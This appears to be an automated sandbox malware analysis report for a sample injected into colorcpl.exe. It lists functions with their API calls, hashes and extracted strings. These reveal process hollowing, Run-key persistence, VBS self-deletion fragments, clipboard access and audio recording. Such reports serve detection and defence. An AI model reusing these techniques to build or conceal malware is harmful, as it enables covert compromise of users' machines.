                                                          • Instruction ID: 87df11e5d88a9b5f076aa1853a583537a1b3e3a75f40cb476a7d5401cb9673e2
                                                          • Opcode Fuzzy Hash: a11ccca03349ee3a168e7246857483cbef904eea8d4512f8c012dcdfa2ea389b
                                                          • Instruction Fuzzy Hash: E9214162E00305A6DF368B54DA31B9B73AEAB44AE4B564564EF0B9B214F722D940C790
                                                          Function 02FAB539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 02FAB54A
                                                          • LoadResource.KERNEL32(00000000,?,?,02F9F419,00000000), ref: 02FAB55E
                                                          • LockResource.KERNEL32(00000000,?,?,02F9F419,00000000), ref: 02FAB565
                                                          • SizeofResource.KERNEL32(00000000,?,?,02F9F419,00000000), ref: 02FAB574
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID: SETTINGS
                                                          • API String ID: 3473537107-594951305
                                                          • Opcode ID: 85e10745c60614645e62662343534243821547ba5b0ea4b5b4257d0033f1367a
                                                          • Instruction ID: 7e2023d0852796cf643dedf36f0f65b72260847bbcb72eb9989e5f1a690c16eb
                                                          • Opcode Fuzzy Hash: 85e10745c60614645e62662343534243821547ba5b0ea4b5b4257d0033f1367a
                                                          • Instruction Fuzzy Hash: 6FE01276A41314EBEF222B61AC4CD867F39F7CA7967000855F7118A224C6798820DB20
                                                          Function 02F996A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02F996A5
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 02F9971D
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 02F99746
                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02F9975D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 1157919129-0
                                                          • Opcode ID: b52098d18d70189590b9a2bcfc41661f7c53426ed0228ebe58895af792fa2479
                                                          • Instruction ID: 3a37f0a7f6840451bddc8bd083f262076214f1ac3095fa49a804e88de11f2113
                                                          • Opcode Fuzzy Hash: b52098d18d70189590b9a2bcfc41661f7c53426ed0228ebe58895af792fa2479
                                                          • Instruction Fuzzy Hash: FC812F3290011D9BEF15EBA0DC90EEEB77AAF14394F14456ED61AA70A0EF709B49CF50
                                                          Function 02FE2690 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FD8295: GetLastError.KERNEL32(00000020,?,02FCA875,?,?,?,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B), ref: 02FD8299
                                                            • Part of subcall function 02FD8295: _free.LIBCMT ref: 02FD82CC
                                                            • Part of subcall function 02FD8295: SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD830D
                                                            • Part of subcall function 02FD8295: _abort.LIBCMT ref: 02FD8313
                                                            • Part of subcall function 02FD8295: _free.LIBCMT ref: 02FD82F4
                                                            • Part of subcall function 02FD8295: SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD8301
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 02FE279C
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 02FE27F7
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 02FE2806
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,02FD4AED,00000040,?,02FD4C0D,00000055,00000000,?,?,00000055,00000000), ref: 02FE284E
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,02FD4B6D,00000040), ref: 02FE286D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                          • String ID:
                                                          • API String ID: 745075371-0
                                                          • Opcode ID: ba09c9ca9789ddb2e6fe12a5f920fec30435526cddcdaeea26eb16e25d1506e6
                                                          • Instruction ID: e33bca27127360f99a4a73740d41427a14ff8e9b5b0d14269ec2a5fd2ed626cf
                                                          • Opcode Fuzzy Hash: ba09c9ca9789ddb2e6fe12a5f920fec30435526cddcdaeea26eb16e25d1506e6
                                                          • Instruction Fuzzy Hash: 3C515371E002099BDF22DFA5CC45ABE77BDAF48784F044569EE16EB190E7709940CBA1
                                                          Function 02F98847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02F9884C
                                                          • FindFirstFileW.KERNEL32(00000000,?,02FF6618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F98905
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02F9892D
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F9893A
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F98A50
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                          • String ID:
                                                          • API String ID: 1771804793-0
                                                          • Opcode ID: 741d1acf873f4a1f4da68f6962baa6a1f8cabc2213e774ddcda15bd22b36f83b
                                                          • Instruction ID: 04bc8fc6dc27739192b0954b98e1c874600cfb953856544d755da563cbe1fd61
                                                          • Opcode Fuzzy Hash: 741d1acf873f4a1f4da68f6962baa6a1f8cabc2213e774ddcda15bd22b36f83b
                                                          • Instruction Fuzzy Hash: DB51713290020DAAEF04FB70DD559EE777AAF113C4F500169EA1AA71A0EF309B49CF91
                                                          Function 02FACA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02FACB68
                                                            • Part of subcall function 02FA37AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02FA37B9
                                                            • Part of subcall function 02FA37AA: RegSetValueExA.KERNEL32(?,02FF74C8,00000000,?,00000000,00000000,030052F0,?,?,02F9F88E,02FF74C8,5.1.3 Pro), ref: 02FA37E1
                                                            • Part of subcall function 02FA37AA: RegCloseKey.KERNEL32(?,?,?,02F9F88E,02FF74C8,5.1.3 Pro), ref: 02FA37EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                          • API String ID: 4127273184-3576401099
                                                          • Opcode ID: a1a3afd48147663e1243657794dad9a90c1ab677c1b639eb44bb08ffbb63f87f
                                                          • Instruction ID: 0fe3b38769e4534bfcf32237730bffb8d76b4fc0f7750b6e8f049f49535a7084
                                                          • Opcode Fuzzy Hash: a1a3afd48147663e1243657794dad9a90c1ab677c1b639eb44bb08ffbb63f87f
                                                          • Instruction Fuzzy Hash: 781181A2FC421436F89871394D3BF6E3A178B42EE0F40055AEB032B6EAD8C34A5447D2
                                                          Function 02FCBB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02FCBC69
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02FCBC73
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 02FCBC80
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: e19493f5f1b16b1f5238594758e4b69317c701cd94d4620ace7ecf5d8dd113a9
                                                          • Instruction ID: 61449e77ff5d5672559119699bcb99d57ba89a5c11bdbad74fe68c4680b55cde
                                                          • Opcode Fuzzy Hash: e19493f5f1b16b1f5238594758e4b69317c701cd94d4620ace7ecf5d8dd113a9
                                                          • Instruction Fuzzy Hash: 6F31D274D0122D9BCB21DF24DD88B8DBBB8AF08351F6045EAE50CA7290EB709B818F54
                                                          Function 02F9B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 02F9B74C
                                                          • GetClipboardData.USER32(0000000D), ref: 02F9B758
                                                          • CloseClipboard.USER32 ref: 02F9B760
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseDataOpen
                                                          • String ID:
                                                          • API String ID: 2058664381-0
                                                          • Opcode ID: 52311075afdaef4b08c55adb2f3a897d91cf0131a17954b38ce0c77d8afc6a31
                                                          • Instruction ID: 4b3b8b05998609f7a3b1eada8c024461a119385e3c3b6e8fe77f61aa4bfb2f19
                                                          • Opcode Fuzzy Hash: 52311075afdaef4b08c55adb2f3a897d91cf0131a17954b38ce0c77d8afc6a31
                                                          • Instruction Fuzzy Hash: 68E0CD31F45314DFFF21A760E848F8AB7589F40BD5F004518B605AB1D4C7B18800C772
                                                          Function 02FA20B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,02FA1F72,?,?,?,?,?), ref: 02FA2122
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02FA2129
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$FreeProcess
                                                          • String ID:
                                                          • API String ID: 3859560861-0
                                                          • Opcode ID: 4c651c865ad60922b61a0bb5706f8271b9a8c2b0a9881f3d9bc228490b084a32
                                                          • Instruction ID: 2a829f1900ccebfe049493b3f7fbab02db25c93ffba0c62acc833658ca818624
                                                          • Opcode Fuzzy Hash: 4c651c865ad60922b61a0bb5706f8271b9a8c2b0a9881f3d9bc228490b084a32
                                                          • Instruction Fuzzy Hash: C2115772904B12EFDB315F64DD95816B7EAFF04B98305882DF69642821CB32F890CF50
                                                          Function 02FC4BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,02FC490B), ref: 02FC4BDD
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 6ce31cb2cb9e859010301e90374c0df92c25faf7876571302cd889e733eb86b0
                                                          • Instruction ID: 1c4eae36c9afea7444df8af365b100b11aea2880fe96af35192e1cd0b3544435
                                                          • Opcode Fuzzy Hash: 6ce31cb2cb9e859010301e90374c0df92c25faf7876571302cd889e733eb86b0
                                                          • Instruction Fuzzy Hash:
                                                          Function 02FA812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 02FA8171
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA8174
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 02FA8185
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA8188
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 02FA8199
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA819C
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 02FA81AD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA81B0
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02FA8252
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02FA826A
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02FA8280
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02FA82A6
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02FA8328
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 02FA833C
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02FA837C
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02FA8446
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 02FA8463
                                                          • ResumeThread.KERNEL32(?), ref: 02FA8470
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02FA8487
                                                          • GetCurrentProcess.KERNEL32(?), ref: 02FA8492
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 02FA84AD
                                                          • GetLastError.KERNEL32 ref: 02FA84B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                          • API String ID: 4188446516-3035715614
                                                          • Opcode ID: fc38350514325fcd5f6417c1be556baaa9722f999646145eb38f67c3b4fb9b81
                                                          • Instruction ID: 99dddd8892adc403e3f9fd068a2fb5b03d47e49b97df4f882d6d10e0ce87c2d8
                                                          • Opcode Fuzzy Hash: fc38350514325fcd5f6417c1be556baaa9722f999646145eb38f67c3b4fb9b81
                                                          • Instruction Fuzzy Hash: 3EA14FB1A44305EFEB10DF64DD49B6ABBE8FF44788F00481AFA55D6290D7B4D814CB25
                                                          Function 02F9D45B Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 282registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FA288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02F9F903), ref: 02FA289B
                                                            • Part of subcall function 02FA288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02FA28AE
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 02F9D558
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02F9D56B
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 02F9D584
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 02F9D5B4
                                                            • Part of subcall function 02F9B8E7: TerminateThread.KERNEL32(Function_0000A2B8,00000000,030052F0,pth_unenc,02F9D0F3,030052D8,030052F0,?,pth_unenc), ref: 02F9B8F6
                                                            • Part of subcall function 02F9B8E7: UnhookWindowsHookEx.USER32(030050F0), ref: 02F9B902
                                                            • Part of subcall function 02F9B8E7: TerminateThread.KERNEL32(02F9A2A2,00000000,?,pth_unenc), ref: 02F9B910
                                                            • Part of subcall function 02FAC482: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,02FAC5A1,00000000,00000000,?), ref: 02FAC4C1
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,02FF6478,02FF6478,00000000), ref: 02F9D7FF
                                                          • ExitProcess.KERNEL32 ref: 02F9D80B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                          • API String ID: 1861856835-1536747724
                                                          • Opcode ID: 2229d110271dbaeb8d27014a2bbe9d01480b3e9919e15679320e1c52d08cbe7e
                                                          • Instruction ID: aef22a1bb6f472a52b920cb72b1475b7bfcdf88e7df7754fd3805c9ffc302c07
                                                          • Opcode Fuzzy Hash: 2229d110271dbaeb8d27014a2bbe9d01480b3e9919e15679320e1c52d08cbe7e
                                                          • Instruction Fuzzy Hash: 6F91A2716042455AFB29FB24DC60AAFB3EAAF957C4F50042DE34A931A0EF209D49CF52
                                                          Function 02FA24B0 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,030050E4,00000003), ref: 02FA24CF
                                                          • ExitProcess.KERNEL32(00000000), ref: 02FA24DB
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02FA2555
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02FA2564
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02FA256F
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FA2576
                                                          • GetCurrentProcessId.KERNEL32 ref: 02FA257C
                                                          • PathFileExistsW.SHLWAPI(?), ref: 02FA25AD
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 02FA2610
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 02FA262A
                                                          • lstrcatW.KERNEL32(?,.exe), ref: 02FA263C
                                                            • Part of subcall function 02FAC482: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,02FAC5A1,00000000,00000000,?), ref: 02FAC4C1
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02FA267C
                                                          • Sleep.KERNEL32(000001F4), ref: 02FA26BD
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02FA26D2
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02FA26DD
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FA26E4
                                                          • GetCurrentProcessId.KERNEL32 ref: 02FA26EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                          • String ID: .exe$WDH$exepath$open$temp_
                                                          • API String ID: 2649220323-3088914985
                                                          • Opcode ID: c0e80b50e0959d9f24debc651ed589de7223593254e8c002b5a9fb4a5c159723
                                                          • Instruction ID: c22593741474dd5574e52336fde8caf597f1d73b2900b0806ee24c81fa2a96f8
                                                          • Opcode Fuzzy Hash: c0e80b50e0959d9f24debc651ed589de7223593254e8c002b5a9fb4a5c159723
                                                          • Instruction Fuzzy Hash: 615186B1E40219AFEF51A7A09C69EEE737E9F046D4F000565FB02A7281EF749E458F60
                                                          Function 02FAB0D8 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 02FAB1CD
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 02FAB1E1
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02FF60B4), ref: 02FAB209
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,03004EE0,00000000), ref: 02FAB21F
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 02FAB260
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 02FAB278
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 02FAB28D
                                                          • SetEvent.KERNEL32 ref: 02FAB2AA
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 02FAB2BB
                                                          • CloseHandle.KERNEL32 ref: 02FAB2CB
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 02FAB2ED
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 02FAB2F7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                          • API String ID: 738084811-1354618412
                                                          • Opcode ID: b34d80c11a4a7020d5a8770ded3f0820d4f6c1092e2b80741809035c85eb905c
                                                          • Instruction ID: 5c80d0b0f37832684234785fa44135c43a1580e4b7d76a1064dd0db6b5845565
                                                          • Opcode Fuzzy Hash: b34d80c11a4a7020d5a8770ded3f0820d4f6c1092e2b80741809035c85eb905c
                                                          • Instruction Fuzzy Hash: 2551C4B1A442096EFA15F730DCA1AAF7B9E9F517C8F00052AF74696590EF208D09CF66
                                                          Function 02F9D0D1 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 260registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FA288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02F9F903), ref: 02FA289B
                                                            • Part of subcall function 02FA288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02FA28AE
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,030052F0,?,pth_unenc), ref: 02F9D1E0
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02F9D1F3
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,030052F0,?,pth_unenc), ref: 02F9D223
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,030052F0,?,pth_unenc), ref: 02F9D232
                                                            • Part of subcall function 02F9B8E7: TerminateThread.KERNEL32(Function_0000A2B8,00000000,030052F0,pth_unenc,02F9D0F3,030052D8,030052F0,?,pth_unenc), ref: 02F9B8F6
                                                            • Part of subcall function 02F9B8E7: UnhookWindowsHookEx.USER32(030050F0), ref: 02F9B902
                                                            • Part of subcall function 02F9B8E7: TerminateThread.KERNEL32(02F9A2A2,00000000,?,pth_unenc), ref: 02F9B910
                                                            • Part of subcall function 02FABA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02FF6478,02F9D248,.vbs,?,?,?,?,?,030052F0), ref: 02FABA30
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,02FF6478,02FF6478,00000000), ref: 02F9D44D
                                                          • ExitProcess.KERNEL32 ref: 02F9D454
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                          • API String ID: 3797177996-3018399277
                                                          • Opcode ID: 8d6d7517bd190754a3fe246c576eb0c4bbe5dcd3e872ba43abc93063bbb83036
                                                          • Instruction ID: 67c6cb714fee1d032daf6900d7f95f004dc02ca6cfa55bd026dab5dcbfd1362f
                                                          • Opcode Fuzzy Hash: 8d6d7517bd190754a3fe246c576eb0c4bbe5dcd3e872ba43abc93063bbb83036
                                                          • Instruction Fuzzy Hash: AB81A2716083445BFB15FB64DC60AAFB3AAAF957C4F10082DE35A971A0EF609D09CF52
                                                          Function 02F91A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02F91AD9
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 02F91B03
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 02F91B13
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 02F91B23
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 02F91B33
